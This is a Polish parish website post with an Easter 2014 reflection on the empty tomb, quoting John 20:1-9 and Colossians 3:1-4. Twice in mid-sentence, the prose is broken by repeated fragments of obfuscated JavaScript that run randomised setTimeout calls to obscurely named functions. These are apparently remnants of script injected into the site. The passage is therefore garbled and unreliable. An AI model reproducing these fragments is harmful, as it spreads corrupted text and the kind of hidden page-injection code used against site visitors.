wstazka
Kościół Świętego Ducha
Strona główna -> Aktualności
Wpisał:adminicdmstracja Data: 20-04-2014
ikona

Gdzie jest moja śmierć?

(J 20,1-9) Pierwszego dnia po szabacie, wczesnym rankiem, gdy jeszcze było ciemno, Maria Magdalena udała się do grobu i zobaczyła kamień odsunięty od grobu. Pobiegła więc i przybyła do Szymona Piotra i do drugiego ucznia, którego Jezus kochał, i rzekła do nich: Zabrano Pana z grobu i nie wiemy, gdzie Go położono. Wyszedł więc Piotr i ów drugi uczeń i szli do grobu. Biegli oni obydwaj razem, lecz ów drugi uczeń wyprzedził Piotra i przybył pierwszy do grobu. A kiedy się nachylił, zobaczył leżące płótna, jednakże nie wszedł do środka. Nadszedł potem także Szymon Piotr, idący za nim. Wszedł on do wnętrza grobu i ujrzał leżące płótna oraz chustę, która była na Jego głowie, leżącą nie razem z płótnami, ale oddzielnie zwiniętą na jednym miejscu. Wtedy wszedł do wnętrza także i ów drugi uczeń, który przybył pierwszy do grobu. Ujrzał i uwierzył. Dotąd bowiem nie rozumieli jeszcze Pisma, /które mówi/, że On ma powstać z martwych

Jesteśmy URATOWANI! Bo oandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to ŻYCIE zwyciężyło śmierć. Bo ŚWIATŁOŚĆ pokonała mrok!

Twój wyrok? Jesteś wolny!!! JEZUS wziął go na siebie. ON spłacił Twój i mój dług!

Jezus zmartwychwstając wydobywa nas z naszych grobów. Nie z tych słodkich, cukierkowych jakie widujemy w tym czasie w kościołach. Z naszych grobów. Z brudu naszego życia. Z tego co najbardziej wstydliwe. Z tego co w nas najbrudniejsze, najpodlejsze, wręcz cuchnące. Z tego, czego się wstydzisz. Może sam/sama się siebie czasem brzydzisz. Bo ja tak. A Jezus? Jezus nie brzydzi się trupem Twojego i mojego życia. Jezus wchodzi w Twoją i moją śmierć by ja zniszczyć!

O śmierci, gdzie jesteś o śmierci? Gdzie jest moja śmierć? Gdzie jest jej zwycięstwo? On andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to JUŻ pokonał! Rozumiesz? To JUŻ się stało!

Cały świat krzyczy dziś najkrótszy telegram: „STOP! ŚMIERCI JUŻ NIE MA!”.

A zamiast życzeń, a może jako najlepsze życzenia na ten czas Słowo z  II czytania Niedzieli Zmartwychwstania Pańskiego:

Jeśliście więc razem z Chrystusem powstali z martwych, szukajcie tego, co w górze, gdzie przebywa Chrystus zasiadając po prawicy Boga. Dążcie do tego, co w górze, nie do tego, co na ziemi. Umarliście bowiem i wasze życie jest ukryte z Chrystusem w Bogu. Gdy się ukaże Chrystus, nasze życie, wtedy i wy razem z Nim ukażecie się w chwale(Kol 3,1-4).

Nowego życia w Zmartwychwstałym Ci życzę!

Ewa Łaskarzewska

Podziel się na:

Komentarze
Przejdź do:
aktualności dla ducha video